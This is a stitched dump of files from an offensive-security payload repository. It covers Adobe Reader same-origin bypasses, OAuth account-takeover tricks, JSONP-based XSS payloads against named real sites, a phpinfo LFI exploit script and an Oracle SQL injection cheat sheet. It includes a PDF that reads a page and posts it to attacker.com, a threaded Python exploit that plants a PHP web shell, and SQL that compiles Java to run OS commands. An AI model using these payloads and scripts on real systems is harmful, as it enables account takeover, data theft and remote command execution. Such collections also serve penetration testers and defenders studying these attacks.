15 | It worked: 16 | 17 | ![](https://4.bp.blogspot.com/-is4Q5hSZk-Y/VIwdzdAckWI/AAAAAAAAACI/OAzBs9Q-T50/s1600/xxe.png) 18 | 19 | ```text 20 | 7 0 obj 21 | << 22 | /Type /Action 23 | /S /JavaScript 24 | /JS ( 25 | var cXMLDoc = '<?xml version="1.0" encoding="ISO-8859-1"?><foo>muh</foo>' 26 | var cXMLDoc2 = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ENTITY aaaa SYSTEM "http://example.com">]><ab>&aaaa;</ab>' 27 | xml = XMLData.parse(cXMLDoc,false); 28 | xml.loadXML(cXMLDoc2,false,true); 29 | ) 30 | >> 31 | endobj 32 | ``` 33 | 34 | 35 | The Impact is limited because 36 | o\) it is limited to same origin 37 | o\) HTML Pages break the xml 38 | o\) Dynamic Entities are not supported 39 | o\) I had the idea to use a utf-16 xml to avoid breaking the xml structure, but it didn't work. 40 | 41 | But it still can be used to read JSON. 42 | 43 | ### Same origin policy bypass in Reader \(CVE-2014-8453\) 44 | 45 | Status: fixed 46 | Reality: fixed but same origin still vulnerable! 47 | 48 | In my opinion this is the most powerful vulnerability. Even without the Origin Bypass it shows you 49 | how powerful/terrifying PDF can be. 50 | Many people know that PDF supports a scripting language called Javascript but there is another one. 51 | It is mentioned in the specification for XFA, a file type also supported by the adobe reader. 52 | It is called formcalc and it is not that powerful. It is used for simple math calculation. But in the adobe specification 53 | there are three additional functions: 'GET','POST' and 'PUT'. Yes, their names speak for themselves. 54 | 'GET' has one parameter: a URL. It will use the browser \(YEAH COOKIES\) to retrieve the URL and return the content of it. 55 | We can then use 'POST' to send the returned content to our own server: 56 | 57 | var content = GET\("myfriends.php"\); 58 | Post\("http://attacker.com",content\); 59 | 60 | These functions are same origin, so a website needs to allow us to upload a PDF. 
Thats not that unrealistic for 61 | most websites. Attacker.com is not same origin, so you need to setup a crossdomain.xml, as usual with Adobe products. 62 | 63 | To sum up: This is not a bug, this is a feature. As soon as you are allowed to upload a PDF on a website, 64 | you can access the website in the context of the user, who is viewing the PDF. Because the requests are issued 65 | by the browser, cookies are sent too. You can also use it to break any CSRF Protection by reading the tokens. 66 | 67 | ```text 68 | 69 | % a PDF file using an XFA 70 | % most whitespace can be removed (truncated to 570 bytes or so...) 71 | % Ange Albertini BSD Licence 2012 72 | 73 | % modified by insertscript 74 | 75 | %PDF-1. % can be truncated to %PDF-\0 76 | 77 | 1 0 obj <<>> 78 | stream 79 | <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> 80 | <config><present><pdf> 81 | <interactive>1</interactive> 82 | </pdf></present></config> 83 | <template> 84 | <subform name="_"> 85 | <pageSet/> 86 | <field id="Hello World!"> 87 | <event activity="initialize"> 88 | <script contentType='application/x-formcalc'> 89 | var content = GET("myfriends.php"); 90 | Post("http://attacker.com",content); 91 | </script> 92 | </event> 93 | </field> 94 | </subform> 95 | </template> 96 | </xdp:xdp> 97 | endstream 98 | endobj 99 | 100 | trailer << 101 | /Root << 102 | /AcroForm << 103 | /Fields [<< 104 | /T (0) 105 | /Kids [<< 106 | /Subtype /Widget 107 | /Rect [] 108 | /T () 109 | /FT /Btn 110 | >>] 111 | >>] 112 | /XFA 1 0 R 113 | >> 114 | /Pages <<>> 115 | >> 116 | >> 117 | 118 | 119 | ``` 120 | 121 | 122 | After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim browser 123 | as a proxy \(@beef still working on the module^^\) 124 | 125 | The bypass is really simple: 126 | 127 | 1. User A loads evil.pdf from http://attacker.com/evil.pdf 128 | 2. Evil.pdf uses formcalc GET to read http://attacker.com/redirect.php 129 | 3. 
redirect.php redirects with 301 to http://facebook.com 130 | 4. Adobe reader will follow and read the response without looking for a crossdomain.xml. 131 | 5. evil.pdf sends the content retrieved via POST to http://attacker.com/log.php 132 | 133 | Note that using this technique you can steal the CSRF tokens of a page and abuse CSRF vulns. 134 | 135 | This simple bypass is fixed now. I hope they are going to implement a dialog warning for same origin requests too. 136 | -------------------------------------------------------------------------------- /Web Application/0Auth 2.0/README.md: -------------------------------------------------------------------------------- 1 | # OAuth 2.0 2 | 3 | *** 4 | 5 | ## Summary 6 | - [Bypass de Autenticación a través de Implicit Grant Type](#bypass-de-autenticacion-a-traves-de-implicit-grant-type) 7 | - [Endpoints con Información Sensible](#endpoints-con-informacion-sensible) 8 | - [Vinculación Forzada de Perfiles OAuth](#vinculacion-forzada-de-perfiles-oauth) 9 | - [Account Take Over con "redirect_uri"](#account-take-over-con-redirecturi) 10 | - [Bypass "redirect_uri 01"](#bypass-redirecturi01) 11 | - [Bypass "redirect_uri 02"](#bypass-redirecturi02) 12 | - [Robar Tokens de Acceso con openRedirect](#robar-tokens-de-acceso-con-openredirect) 13 | - [Iframe, postMessage() y window.location.href(\*)](#iframe-postmessage-y-windowslocationhref*) 14 | 15 | *** 16 | 17 | ## Bypass de Autenticación a través de Implicit Grant Type 18 | 19 | Interceptar la request `/authenticate` y cambiar el valor correspondiente al parámetro que se envía, por el de otro usuario válido (e.g.: `test@test.net` --> `carlos@carlos-montoya.net`): 20 | ``` 21 | POST /authenticate HTTP/1.1 22 | Host: [proveedorOAUTH] 23 | Cookie: session=RTNhdbNYvS41LuseC7SIhX0m1f4AxYmM 24 | 25 | { 26 | "email":"carlos@carlos-montoya.net", 27 | "username":"wiener", 28 | "token":"8vHFVoNGFiI9pD0nvJ6emJW2iZB-VM6SiBuuBDtdYC8" 29 | } 30 | ``` 31 | 32 | *** 33 | 34 | ## Endpoints con 
Información Sensible 35 | 36 | Dan información para poder testear si es posible registrar una aplicación cliente maliciosa: 37 | ``` 38 | /.well-known/oauth-authorization-server 39 | /.well-known/openid-configuration 40 | ``` 41 | 42 | *** 43 | 44 | ## Vinculación Forzada de Perfiles OAuth 45 | 46 | 1. Iniciar sesión con credenciales comunes. 47 | 2. Cerrar sesión. 48 | 3. Relogearse (esta vez sin credenciales, ya que la aplicación debería guardar el previo login) y adjuntar perfil de RR.SS. con BurpSuite activo. 49 | 4. Interceptar la request que presente `oauth-linking`: 50 | 51 | ``` 52 | GET /auth?client_id=x3ywm971gmk1p5xowwqjl&redirect_uri=https://[appCliente]/oauth-linking&response_type=code&scope=openid%20profile%20email HTTP/1.1 53 | 54 | Host: [proveedorOAUTH] 55 | ``` 56 | 57 | 5. Verificar que no contenga el parámetro `state`. 58 | 6. Adjuntar RR.SS. de nuevo y buscar la request: 59 | 60 | ``` 61 | GET /oauth-linking?code=[...] 62 | ``` 63 | 64 | 7. Copiar URL y rechazar la request para conservar el código. 65 | 8. 
Elaborar ataque a víctima 66 | 67 | ## Account Take Over con "redirect_uri" 68 | 69 | Iniciar sesión y buscar la request: 70 | ``` 71 | GET /auth?client_id=x3ywm971gmk1p5xowwqjl&redirect_uri=https://[appCliente]/oauth-linking&response_type=code&scope=openid%20profile%20email HTTP/1.1 72 | 73 | Host: [proveedorOAUTH] 74 | ``` 75 | 76 | Cambiar `redirect_uri` a: 77 | 78 | ``` 79 | redirect_uri=https://YOUR-EXPLOIT-SERVER-ID/ 80 | ``` 81 | 82 | *** 83 | 84 | ## Bypass "redirect_uri 01" 85 | ``` 86 | redirect_uri=https://default-host.com &@foo.evil-user.net#@bar.evil-user.net/ 87 | ``` 88 | ``` 89 | redirect_uri=https://localhost.evil-user.net/ 90 | ``` 91 | ``` 92 | https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&response_mode=query 93 | ``` 94 | ``` 95 | https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&response_mode=fragment 96 | ``` 97 | ``` 98 | https://oauth-authorization-server.com/?client_id=123&redirect_uri=client-app.com/callback&redirect_uri=evil-user.net 99 | ``` 100 | 101 | *** 102 | 103 | ## Bypass "redirect_uri 02" 104 | 105 | Otra forma interesante de bypassear este parámetro es utilizando `fallback_redirect_uri`, siempre y cuando las condiciones en los parámetros anteriores a este se cumplan: 106 | 107 | Si la petición se ve similar a la siguiente y no es posible un bypass: 108 | ``` 109 | https://m.facebook.com/v3.3/dialog/oauth?app_id=124024574287414 110 | &redirect_uri=https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46%23origin=https://www.instagram.com/%26relation=opener 111 | &response_type=token,signed_request 112 | &scope=public_profile,email 113 | ``` 114 | 115 | Intentar con `fallback_redirect_uri`: 116 | ``` 117 | https://m.facebook.com/v3.3/dialog/oauth?app_id=124024574287414 118 | &redirect_uri=https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46%23origin=https://www.instagram.com/%26relation=opener 119 | 
&response_type=token,signed_request 120 | &scope=public_profile,email 121 | &fallback_redirect_uri=https://www.instagram.com/ 122 | ``` 123 | 124 | La anterior request redirigiría a una URL seleccionada en `fallback_redirect_uri` en caso de que el dominio de la URL dentro de `fallback_redirect_uri` sea el mismo que un sitio web incluido en la lista blanca de la aplicación y si se cumplen todas las condiciones. Se ejecutará y se realizará una redirección a la URL seleccionada en `fallback_redirect_uri` con el `código/access_token` de Facebook incrustado en la parte del fragmento de la URL. 125 | 126 | Para explotar esta falla, es necesario tener una vulnerabilidad de `Open Redirect` en el dominio, ya que el parámetro `fallback_redirect_uri` también debería aceptar un dominio de la lista blanca como parte de la redirección. 127 | 128 | *** 129 | 130 | ## Robar Tokens de Acceso con openRedirect 131 | 132 | Cambiar `redirect_uri` a: 133 | ``` 134 | redirect_uri=https://client-app.com/oauth/callback/../../path/dentro/de/aplicacion 135 | ``` 136 | 137 | Luego se debe conseguir un `Open Redirect` para la explotación. 138 | 139 | *** 140 | 141 | ## Iframe, postMessage() y window.location.href(*) 142 | 143 | 1. Buscar alguna sección de comentarios que se ejecute bajo la etiqueta `iframe`. 144 | 2. Mirar su atributo `src=[seguirURL]`. 145 | 3. Validar que se implemente `postMessage()` con `window.location.href(\*)`, es decir, hacia cualquier origen. 146 | 4. 
Evaluar posible explotación 147 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/jsonp_endpoint.txt: -------------------------------------------------------------------------------- 1 | #Google.com: 2 | "><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script> 3 | "><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script> 4 | "><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script> 5 | "><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script> 6 | #Blogger.com: 7 | "><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script> 8 | #Yandex: 9 | "><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script> 10 | "><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script> 11 | #VK.com: 12 | "><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script> 13 | #Marketo.com 14 | "><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> 15 | "><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script> 16 | #AlibabaGroup: 17 | "><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script> 18 | "><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script> 19 | "><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script> 20 | "><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script> 21 | "><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script> 22 | 
"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script> 23 | "><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script> 24 | #Uber.com: 25 | "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script> 26 | #AOL/Yahoo 27 | "><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script> 28 | "><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script> 29 | "><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script> 30 | "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> 31 | "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script> 32 | "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script> 33 | "><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script> 34 | "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script> 35 | "><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script> 36 | 
"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script> 37 | #Twitter.com: 38 | "><script+src="http://search.twitter.com/trends.json?callback=alert()"></script> 39 | "><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script> 40 | "><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script> 41 | #Others: 42 | "><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script> 43 | "><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script> 44 | "><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script> 45 | "><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script> 46 | "><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script> 47 | "><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script> 48 | "><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script> 49 | "><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script> 50 | "><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script> 51 | "><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script> 52 | "><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script> 53 | 
"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script> 54 | #GoogleAPI's 55 | "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always> 56 | "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script> 57 | ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script> -------------------------------------------------------------------------------- /Web Application/LFI and RFI/phpinfolfi.py: -------------------------------------------------------------------------------- 
#!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
from __future__ import print_function
from builtins import range
import sys
import threading
import socket

def setup(host, port):
    """Build the raw HTTP request strings that every worker attempt reuses.

    Returns a tuple (REQ1, TAG, LFIREQ):
      REQ1   - complete multipart POST to /phpinfo.php with `host` already filled in;
      LFIREQ - GET template with two %s slots, (filename, host), filled in by phpInfoLFI;
      TAG    - marker string whose presence in the LFI response signals success.
    `port` is accepted for symmetry with the other helpers but is not used here.
    """
    TAG="Security Test"
    # Uploaded file body. Its first line is TAG, which phpInfoLFI searches for in
    # the LFI response.
    PAYLOAD="""%s\r
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
    # Multipart body wrapping PAYLOAD; the boundary string must match the
    # Content-Type header in REQ1 below.
    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    # The same 5000-byte filler is repeated in the query string and in several
    # request headers of REQ1.
    padding="A" * 5000
    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
    #modify this to suit the LFI script
    # `%%00` survives the later %-formatting as a literal `%00`; the two %s
    # slots are (filename, host).
    LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)

def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
    """Run a single attempt using two sockets to the same host:port.

    Sends `phpinforeq` on the first socket and reads at least `offset` bytes of
    the reply, looks for the "[tmp_name] =>" marker and slices a 14-character
    filename after it, then sends `lfireq` (formatted with (filename, host)) on
    the second socket. Returns the filename when `tag` appears in the first 4096
    bytes of that second reply; returns None explicitly when the marker is
    absent, and implicitly (falls off the end) when `tag` is not found.
    socket.error from connect/send/recv propagates to the caller.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((host, port))
    s2.connect((host, port))

    s.send(phpinforeq)
    d = ""
    # Accumulate until at least `offset` bytes have arrived; each recv asks for
    # up to `offset` more bytes.
    while len(d) < offset:
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =>")
        # Fixed-offset slice (17 bytes past the marker, 14 bytes long); assumes
        # a particular layout of the tmp_name value - TODO confirm against real output.
        fn = d[i+17:i+31]
    except ValueError:
        # NOTE(review): both sockets are left open on this early-return path.
        return None

    s2.send(lfireq % (fn, host))
    d = s2.recv(4096)
    s.close()
    s2.close()

    if d.find(tag) != -1:
        return fn

# Total attempts claimed so far, shared by all workers and guarded by the lock
# passed to ThreadWorker.
counter=0
class ThreadWorker(threading.Thread):
    """Worker thread that repeatedly calls phpInfoLFI until the shared event is
    set or the global attempt budget is exhausted.

    e     - threading.Event used to signal success (or shutdown) to all workers
    l     - threading.Lock protecting the module-level `counter`
    m     - maximum total number of attempts across all workers
    *args - positional arguments forwarded unchanged to phpInfoLFI
    """
    def __init__(self, e, l, m, *args):
        threading.Thread.__init__(self)
        self.event = e
        self.lock = l
        self.maxattempts = m
        self.args = args

    def run(self):
        global counter
        while not self.event.is_set():
            # Claim one attempt under the lock; stop once the budget is spent.
            with self.lock:
                if counter >= self.maxattempts:
                    return
                counter+=1

            try:
                x = phpInfoLFI(*self.args)
                # Another worker may have finished while this attempt was in flight.
                if self.event.is_set():
                    break
                if x:
                    print("\nGot it! Shell created in /tmp/g")
                    self.event.set()

            except socket.error:
                # Any socket failure ends this worker only; the others keep running.
                return


def getOffset(host, port, phpinforeq):
    """Gets offset of tmp_name in the php output

    Sends `phpinforeq` once, reads the whole reply (until EOF or a chunk ending
    in the chunked-encoding final-chunk terminator), and returns the index of
    "[tmp_name] =>" plus 256 bytes of slack. Raises ValueError if the marker
    never appears.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    s.send(phpinforeq)

    d = ""
    while True:
        i = s.recv(4096)
        d+=i
        # Empty recv means the peer closed the connection.
        if i == "":
            break
        # detect the final chunk
        if i.endswith("0\r\n\r\n"):
            break
    s.close()
    i = d.find("[tmp_name] =>")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")

    print("found %s at %i" % (d[i:i+10],i))
    # padded up a bit
    return i+256

def main():
    """Command-line entry point.

    Parses host [port] [threads] from sys.argv, computes the phpinfo offset,
    starts `poolsz` ThreadWorkers sharing one Event, one Lock and a 1000-attempt
    budget, and prints progress once a second until a worker sets the event,
    the budget is spent, or Ctrl-C is pressed. Exits with status 1 on bad arguments.
    """

    print("LFI With PHPInfo()")
    print("-=" * 30)

    if len(sys.argv) < 2:
        print("Usage: %s host [port] [threads]" % sys.argv[0])
        sys.exit(1)

    try:
        host = socket.gethostbyname(sys.argv[1])
    except socket.error as e:
        print("Error with hostname %s: %s" % (sys.argv[1], e))
        sys.exit(1)

    port=80
    try:
        port = int(sys.argv[2])
    except IndexError:
        pass
    except ValueError as e:
        # NOTE(review): sys.argv[2] is a str, so the %d below raises TypeError
        # instead of printing the intended message.
        print("Error with port %d: %s" % (sys.argv[2], e))
        sys.exit(1)

    poolsz=10
    try:
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
    except ValueError as e:
        # NOTE(review): same %d-with-str issue as the port branch above.
        print("Error with poolsz %d: %s" % (sys.argv[3], e))
        sys.exit(1)

    print("Getting initial offset...", end=' ')
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()

    maxattempts = 1000
    e = threading.Event()
    l = threading.Lock()

    print("Spawning worker pool (%d)..." % poolsz)
    sys.stdout.flush()

    tp = []
    for i in range(0,poolsz):
        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:
        t.start()
    try:
        # e.wait(1) returns True as soon as a worker sets the event; otherwise
        # print progress (under the lock) and stop once the budget is spent.
        while not e.wait(1):
            if e.is_set():
                break
            with l:
                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
        print()
        if e.is_set():
            print("Woot! \m/")
        else:
            print(":(")
    except KeyboardInterrupt:
        # Setting the event makes every worker leave its loop on the next check.
        print("\nTelling threads to shutdown...")
        e.set()

    print("Shuttin' down...")
    for t in tp:
        t.join()

if __name__=="__main__":
    print("Don't forget to modify the LFI URL")
    main()
-------------------------------------------------------------------------------- /Web Application/SQL Injection/OracleSQL Injection.md: -------------------------------------------------------------------------------- 1 | # Oracle SQL Injection 2 | 3 | ## Summary 4 | 5 | * [Oracle SQL version](#oracle-sql-version) 6 | * [Oracle SQL database name](#oracle-sql-database-name) 7 | * [Oracle SQL List databases](#oracle-sql-list-databases) 8 | * [Oracle SQL List columns](#oracle-sql-list-columns) 9 | * [Oracle SQL List tables](#oracle-sql-list-tables) 10 | * [Oracle SQL Error Based](#oracle-sql-error-based) 11 | * [Oracle SQL Blind](#oracle-sql-blind) 12 | * [Oracle SQL Time Based](#oracle-sql-time-based) 13 | * [Oracle Out of Band](#oracle-out-of-band) 14 | * [Oracle SQL Command execution](#oracle-sql-command-execution) 15 | * [References](#references) 16 | 17 | ## Oracle SQL version 18 | 19 | ```sql 20 | SELECT user FROM dual UNION SELECT * FROM v$version 21 | ``` 22 | 23 | ## Oracle SQL database name 24 | 25 | ```sql 26 | SELECT global_name FROM global_name; 27 | SELECT name FROM V$DATABASE; 28 | SELECT instance_name FROM V$INSTANCE; 29 | SELECT SYS.DATABASE_NAME FROM DUAL; 30 | ``` 31 
| 32 | ## Oracle SQL List Databases 33 | 34 | ```sql 35 | SELECT DISTINCT owner FROM all_tables; 36 | ``` 37 | 38 | ## Oracle SQL List Columns 39 | 40 | ```sql 41 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; 42 | SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; 43 | ``` 44 | 45 | ## Oracle SQL List Tables 46 | 47 | ```sql 48 | SELECT table_name FROM all_tables; 49 | SELECT owner, table_name FROM all_tables; 50 | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; 51 | ``` 52 | 53 | ## Oracle SQL Error based 54 | 55 | | Description | Query | 56 | | :------------- | :------------- | 57 | | Invalid HTTP Request | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual | 58 | | CTXSYS.DRITHSX.SN | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual | 59 | | Invalid XPath | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual | 60 | | Invalid XML | SELECT to_char(dbms_xmlgen.getxml('select "'&#124;&#124;(select user from sys.dual)&#124;&#124;'" FROM sys.dual')) FROM dual | 61 | | Invalid XML | SELECT rtrim(extract(xmlagg(xmlelement("s", username &#124;&#124; ',')),'/s').getstringval(),',') FROM all_users | 62 | 63 | ## Oracle SQL Blind 64 | 65 | | Description | Query | 66 | | :------------- | :------------- | 67 | | Version is 12.2 | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; | 68 | | Subselect is enabled | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) | 69 | | Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); | 70 | | Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; | 71 | | First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; | 72 | 73 | ## Oracle SQL Time based 74 | 75 | 
```sql 76 | AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/ 77 | ``` 78 | 79 | ## Oracle Out of Band 80 | 81 | ```powershell 82 | '+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//x.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual-- 83 | ``` 84 | ```powershell 85 | SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')-- 86 | ``` 87 | 88 | 89 | ## Oracle SQL Command execution 90 | 91 | ```sql 92 | /* create Java class */ 93 | BEGIN 94 | EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};'; 95 | END; 96 | / 97 | 98 | BEGIN 99 | EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';'; 100 | END; 101 | / 102 | 103 | /* run OS command */ 104 | SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; 105 | ``` 106 | 107 | or (hex encoded) 108 | 109 | ```sql 110 | /* create Java class */ 111 | SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''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'')); 112 | EXECUTE IMMEDIATE 
utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual 113 | 114 | /* run OS command */ 115 | SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual; 116 | ``` 117 | -------------------------------------------------------------------------------- /Web Application/Directory Traversal/README.md: -------------------------------------------------------------------------------- 1 | # Directory traversal 2 | 3 | A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Basic exploitation](#basic-exploitation) 9 | * [16 bits Unicode encoding](#16-bits-unicode-encoding) 10 | * [UTF-8 Unicode encoding](#utf-8-unicode-encoding) 11 | * [Bypass "../" replaced by ""](#bypass--replaced-by-) 12 | * [Bypass "../" with ";"](#bypass--with-) 13 | * [Double URL encoding](#double-url-encoding) 14 | * [UNC Bypass](#unc-bypass) 15 | * [NGINX/ALB Bypass](#nginxalb-bypass) 16 | * [Path Traversal](#path-traversal) 17 | * [Interesting Linux files](#interesting-linux-files) 18 | * [Interesting Windows 